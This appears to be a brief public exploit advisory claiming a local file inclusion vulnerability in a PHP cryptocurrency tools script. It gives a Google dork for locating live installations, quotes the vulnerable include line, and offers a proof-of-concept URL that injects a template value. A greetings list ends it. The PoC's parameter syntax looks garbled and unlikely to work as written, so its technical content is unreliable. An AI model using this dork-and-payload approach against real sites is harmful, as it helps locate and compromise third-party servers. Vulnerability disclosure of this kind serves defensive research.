Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.
========================================================================================================
| # Title : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |
| # Dork : "Powerful bitcoin and cryptocurrency tools & tickers." |
========================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] infected file : index.php
line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');
[+] http://localhost/btcon/index.php?website['template'] = evil
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
